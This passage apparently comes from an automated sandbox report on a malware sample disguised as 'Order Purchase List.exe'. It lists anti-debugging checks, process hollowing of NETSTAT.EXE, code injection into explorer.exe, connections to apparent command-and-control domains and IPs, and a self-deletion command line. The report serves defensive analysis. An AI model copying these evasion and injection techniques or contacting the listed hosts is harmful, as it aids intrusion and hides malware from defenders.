Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE7016 mov eax, dword ptr fs:[00000030h]	19_2_02EE7016
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE7016 mov eax, dword ptr fs:[00000030h]	19_2_02EE7016
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE7016 mov eax, dword ptr fs:[00000030h]	19_2_02EE7016
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EF41E8 mov eax, dword ptr fs:[00000030h]	19_2_02EF41E8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6B1E1 mov eax, dword ptr fs:[00000030h]	19_2_02E6B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6B1E1 mov eax, dword ptr fs:[00000030h]	19_2_02E6B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6B1E1 mov eax, dword ptr fs:[00000030h]	19_2_02E6B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE69A6 mov eax, dword ptr fs:[00000030h]	19_2_02EE69A6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E961A0 mov eax, dword ptr fs:[00000030h]	19_2_02E961A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E961A0 mov eax, dword ptr fs:[00000030h]	19_2_02E961A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE51BE mov eax, dword ptr fs:[00000030h]	19_2_02EE51BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE51BE mov eax, dword ptr fs:[00000030h]	19_2_02EE51BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE51BE mov eax, dword ptr fs:[00000030h]	19_2_02EE51BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE51BE mov eax, dword ptr fs:[00000030h]	19_2_02EE51BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E8C182 mov eax, dword ptr fs:[00000030h]	19_2_02E8C182
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9A185 mov eax, dword ptr fs:[00000030h]	19_2_02E9A185
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E92990 mov eax, dword ptr fs:[00000030h]	19_2_02E92990
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6C962 mov eax, dword ptr fs:[00000030h]	19_2_02E6C962
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6B171 mov eax, dword ptr fs:[00000030h]	19_2_02E6B171
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6B171 mov eax, dword ptr fs:[00000030h]	19_2_02E6B171
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E8B944 mov eax, dword ptr fs:[00000030h]	19_2_02E8B944
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E8B944 mov eax, dword ptr fs:[00000030h]	19_2_02E8B944
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E84120 mov eax, dword ptr fs:[00000030h]	19_2_02E84120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E84120 mov eax, dword ptr fs:[00000030h]	19_2_02E84120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E84120 mov eax, dword ptr fs:[00000030h]	19_2_02E84120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E84120 mov eax, dword ptr fs:[00000030h]	19_2_02E84120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E84120 mov ecx, dword ptr fs:[00000030h]	19_2_02E84120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9513A mov eax, dword ptr fs:[00000030h]	19_2_02E9513A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9513A mov eax, dword ptr fs:[00000030h]	19_2_02E9513A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E69100 mov eax, dword ptr fs:[00000030h]	19_2_02E69100
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E69100 mov eax, dword ptr fs:[00000030h]	19_2_02E69100
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E69100 mov eax, dword ptr fs:[00000030h]	19_2_02E69100
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E776E2 mov eax, dword ptr fs:[00000030h]	19_2_02E776E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E916E0 mov ecx, dword ptr fs:[00000030h]	19_2_02E916E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F38ED6 mov eax, dword ptr fs:[00000030h]	19_2_02F38ED6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E936CC mov eax, dword ptr fs:[00000030h]	19_2_02E936CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA8EC7 mov eax, dword ptr fs:[00000030h]	19_2_02EA8EC7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F1FEC0 mov eax, dword ptr fs:[00000030h]	19_2_02F1FEC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE46A7 mov eax, dword ptr fs:[00000030h]	19_2_02EE46A7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F30EA5 mov eax, dword ptr fs:[00000030h]	19_2_02F30EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F30EA5 mov eax, dword ptr fs:[00000030h]	19_2_02F30EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F30EA5 mov eax, dword ptr fs:[00000030h]	19_2_02F30EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EFFE87 mov eax, dword ptr fs:[00000030h]	19_2_02EFFE87
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7766D mov eax, dword ptr fs:[00000030h]	19_2_02E7766D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E8AE73 mov eax, dword ptr fs:[00000030h]	19_2_02E8AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E8AE73 mov eax, dword ptr fs:[00000030h]	19_2_02E8AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E8AE73 mov eax, dword ptr fs:[00000030h]	19_2_02E8AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E8AE73 mov eax, dword ptr fs:[00000030h]	19_2_02E8AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E8AE73 mov eax, dword ptr fs:[00000030h]	19_2_02E8AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E77E41 mov eax, dword ptr fs:[00000030h]	19_2_02E77E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E77E41 mov eax, dword ptr fs:[00000030h]	19_2_02E77E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E77E41 mov eax, dword ptr fs:[00000030h]	19_2_02E77E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E77E41 mov eax, dword ptr fs:[00000030h]	19_2_02E77E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E77E41 mov eax, dword ptr fs:[00000030h]	19_2_02E77E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E77E41 mov eax, dword ptr fs:[00000030h]	19_2_02E77E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2AE44 mov eax, dword ptr fs:[00000030h]	19_2_02F2AE44
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2AE44 mov eax, dword ptr fs:[00000030h]	19_2_02F2AE44
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6E620 mov eax, dword ptr fs:[00000030h]	19_2_02E6E620
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F1FE3F mov eax, dword ptr fs:[00000030h]	19_2_02F1FE3F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6C600 mov eax, dword ptr fs:[00000030h]	19_2_02E6C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6C600 mov eax, dword ptr fs:[00000030h]	19_2_02E6C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6C600 mov eax, dword ptr fs:[00000030h]	19_2_02E6C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E98E00 mov eax, dword ptr fs:[00000030h]	19_2_02E98E00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9A61C mov eax, dword ptr fs:[00000030h]	19_2_02E9A61C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9A61C mov eax, dword ptr fs:[00000030h]	19_2_02E9A61C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21608 mov eax, dword ptr fs:[00000030h]	19_2_02F21608
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA37F5 mov eax, dword ptr fs:[00000030h]	19_2_02EA37F5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E78794 mov eax, dword ptr fs:[00000030h]	19_2_02E78794
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE7794 mov eax, dword ptr fs:[00000030h]	19_2_02EE7794
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE7794 mov eax, dword ptr fs:[00000030h]	19_2_02EE7794
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE7794 mov eax, dword ptr fs:[00000030h]	19_2_02EE7794
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7FF60 mov eax, dword ptr fs:[00000030h]	19_2_02E7FF60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F38F6A mov eax, dword ptr fs:[00000030h]	19_2_02F38F6A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7EF40 mov eax, dword ptr fs:[00000030h]	19_2_02E7EF40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E64F2E mov eax, dword ptr fs:[00000030h]	19_2_02E64F2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E64F2E mov eax, dword ptr fs:[00000030h]	19_2_02E64F2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9E730 mov eax, dword ptr fs:[00000030h]	19_2_02E9E730
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9A70E mov eax, dword ptr fs:[00000030h]	19_2_02E9A70E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9A70E mov eax, dword ptr fs:[00000030h]	19_2_02E9A70E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F3070D mov eax, dword ptr fs:[00000030h]	19_2_02F3070D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F3070D mov eax, dword ptr fs:[00000030h]	19_2_02F3070D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E8F716 mov eax, dword ptr fs:[00000030h]	19_2_02E8F716
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EFFF10 mov eax, dword ptr fs:[00000030h]	19_2_02EFFF10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EFFF10 mov eax, dword ptr fs:[00000030h]	19_2_02EFFF10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F214FB mov eax, dword ptr fs:[00000030h]	19_2_02F214FB
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE6CF0 mov eax, dword ptr fs:[00000030h]	19_2_02EE6CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE6CF0 mov eax, dword ptr fs:[00000030h]	19_2_02EE6CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE6CF0 mov eax, dword ptr fs:[00000030h]	19_2_02EE6CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F38CD6 mov eax, dword ptr fs:[00000030h]	19_2_02F38CD6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7849B mov eax, dword ptr fs:[00000030h]	19_2_02E7849B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E8746D mov eax, dword ptr fs:[00000030h]	19_2_02E8746D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9A44B mov eax, dword ptr fs:[00000030h]	19_2_02E9A44B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EFC450 mov eax, dword ptr fs:[00000030h]	19_2_02EFC450
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EFC450 mov eax, dword ptr fs:[00000030h]	19_2_02EFC450
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9BC2C mov eax, dword ptr fs:[00000030h]	19_2_02E9BC2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE6C0A mov eax, dword ptr fs:[00000030h]	19_2_02EE6C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE6C0A mov eax, dword ptr fs:[00000030h]	19_2_02EE6C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE6C0A mov eax, dword ptr fs:[00000030h]	19_2_02EE6C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE6C0A mov eax, dword ptr fs:[00000030h]	19_2_02EE6C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21C06 mov eax, dword ptr fs:[00000030h]	19_2_02F21C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21C06 mov eax, dword ptr fs:[00000030h]	19_2_02F21C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21C06 mov eax, dword ptr fs:[00000030h]	19_2_02F21C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21C06 mov eax, dword ptr fs:[00000030h]	19_2_02F21C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21C06 mov eax, dword ptr fs:[00000030h]	19_2_02F21C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21C06 mov eax, dword ptr fs:[00000030h]	19_2_02F21C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21C06 mov eax, dword ptr fs:[00000030h]	19_2_02F21C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21C06 mov eax, dword ptr fs:[00000030h]	19_2_02F21C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21C06 mov eax, dword ptr fs:[00000030h]	19_2_02F21C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21C06 mov eax, dword ptr fs:[00000030h]	19_2_02F21C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21C06 mov eax, dword ptr fs:[00000030h]	19_2_02F21C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21C06 mov eax, dword ptr fs:[00000030h]	19_2_02F21C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21C06 mov eax, dword ptr fs:[00000030h]	19_2_02F21C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F21C06 mov eax, dword ptr fs:[00000030h]	19_2_02F21C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F3740D mov eax, dword ptr fs:[00000030h]	19_2_02F3740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F3740D mov eax, dword ptr fs:[00000030h]	19_2_02F3740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F3740D mov eax, dword ptr fs:[00000030h]	19_2_02F3740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F18DF1 mov eax, dword ptr fs:[00000030h]	19_2_02F18DF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7D5E0 mov eax, dword ptr fs:[00000030h]	19_2_02E7D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7D5E0 mov eax, dword ptr fs:[00000030h]	19_2_02E7D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2FDE2 mov eax, dword ptr fs:[00000030h]	19_2_02F2FDE2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2FDE2 mov eax, dword ptr fs:[00000030h]	19_2_02F2FDE2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2FDE2 mov eax, dword ptr fs:[00000030h]	19_2_02F2FDE2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2FDE2 mov eax, dword ptr fs:[00000030h]	19_2_02F2FDE2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE6DC9 mov eax, dword ptr fs:[00000030h]	19_2_02EE6DC9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE6DC9 mov eax, dword ptr fs:[00000030h]	19_2_02EE6DC9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE6DC9 mov eax, dword ptr fs:[00000030h]	19_2_02EE6DC9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE6DC9 mov ecx, dword ptr fs:[00000030h]	19_2_02EE6DC9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE6DC9 mov eax, dword ptr fs:[00000030h]	19_2_02EE6DC9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE6DC9 mov eax, dword ptr fs:[00000030h]	19_2_02EE6DC9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E935A1 mov eax, dword ptr fs:[00000030h]	19_2_02E935A1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E91DB5 mov eax, dword ptr fs:[00000030h]	19_2_02E91DB5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E91DB5 mov eax, dword ptr fs:[00000030h]	19_2_02E91DB5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E91DB5 mov eax, dword ptr fs:[00000030h]	19_2_02E91DB5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F305AC mov eax, dword ptr fs:[00000030h]	19_2_02F305AC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F305AC mov eax, dword ptr fs:[00000030h]	19_2_02F305AC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E92581 mov eax, dword ptr fs:[00000030h]	19_2_02E92581
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E92581 mov eax, dword ptr fs:[00000030h]	19_2_02E92581
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E92581 mov eax, dword ptr fs:[00000030h]	19_2_02E92581
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E92581 mov eax, dword ptr fs:[00000030h]	19_2_02E92581
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E62D8A mov eax, dword ptr fs:[00000030h]	19_2_02E62D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E62D8A mov eax, dword ptr fs:[00000030h]	19_2_02E62D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E62D8A mov eax, dword ptr fs:[00000030h]	19_2_02E62D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E62D8A mov eax, dword ptr fs:[00000030h]	19_2_02E62D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E62D8A mov eax, dword ptr fs:[00000030h]	19_2_02E62D8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9FD9B mov eax, dword ptr fs:[00000030h]	19_2_02E9FD9B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9FD9B mov eax, dword ptr fs:[00000030h]	19_2_02E9FD9B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E8C577 mov eax, dword ptr fs:[00000030h]	19_2_02E8C577
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E8C577 mov eax, dword ptr fs:[00000030h]	19_2_02E8C577
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA3D43 mov eax, dword ptr fs:[00000030h]	19_2_02EA3D43
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE3540 mov eax, dword ptr fs:[00000030h]	19_2_02EE3540
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E87D50 mov eax, dword ptr fs:[00000030h]	19_2_02E87D50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F38D34 mov eax, dword ptr fs:[00000030h]	19_2_02F38D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2E539 mov eax, dword ptr fs:[00000030h]	19_2_02F2E539
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E94D3B mov eax, dword ptr fs:[00000030h]	19_2_02E94D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E94D3B mov eax, dword ptr fs:[00000030h]	19_2_02E94D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E94D3B mov eax, dword ptr fs:[00000030h]	19_2_02E94D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]	19_2_02E73D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]	19_2_02E73D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]	19_2_02E73D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]	19_2_02E73D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]	19_2_02E73D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]	19_2_02E73D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]	19_2_02E73D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]	19_2_02E73D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]	19_2_02E73D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]	19_2_02E73D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]	19_2_02E73D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]	19_2_02E73D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]	19_2_02E73D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6AD30 mov eax, dword ptr fs:[00000030h]	19_2_02E6AD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EEA537 mov eax, dword ptr fs:[00000030h]	19_2_02EEA537

Source: C:\Users\user\Desktop\Order Purchase List.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Order Purchase List.exe

Code function: 10_2_00409B50 LdrLoadDll,

10_2_00409B50

Source: C:\Users\user\Desktop\Order Purchase List.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 154.23.204.56 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.hottorchlighter.com
Source: C:\Windows\explorer.exe	Domain query: www.auxiliacapitalpartnersllc.com
Source: C:\Windows\explorer.exe	Domain query: www.bigbigsea.com
Source: C:\Windows\explorer.exe	Domain query: www.inatividigitali.com
Source: C:\Windows\explorer.exe	Network Connect: 104.21.44.253 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 68.178.221.206 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.greatamericanlandworks.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Order Purchase List.exe

Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 140000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Order Purchase List.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Order Purchase List.exe

Memory written: C:\Users\user\Desktop\Order Purchase List.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Order Purchase List.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Order Purchase List.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Thread register set: target process: 3352	Jump to behavior

Source: C:\Users\user\Desktop\Order Purchase List.exe	Process created: C:\Users\user\Desktop\Order Purchase List.exe {path}			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order Purchase List.exe'			Jump to behavior

Source: explorer.exe, 0000000C.00000000.352067897.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000013.00000002.543686989.00000000057E0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000C.00000000.330532888.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 0000000C.00000000.352067897.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000013.00000002.543686989.00000000057E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000000.352067897.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000013.00000002.543686989.00000000057E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000000.352067897.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000013.00000002.543686989.00000000057E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000C.00000000.359000138.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Users\user\Desktop\Order Purchase List.exe VolumeInformation	Jump to behavior
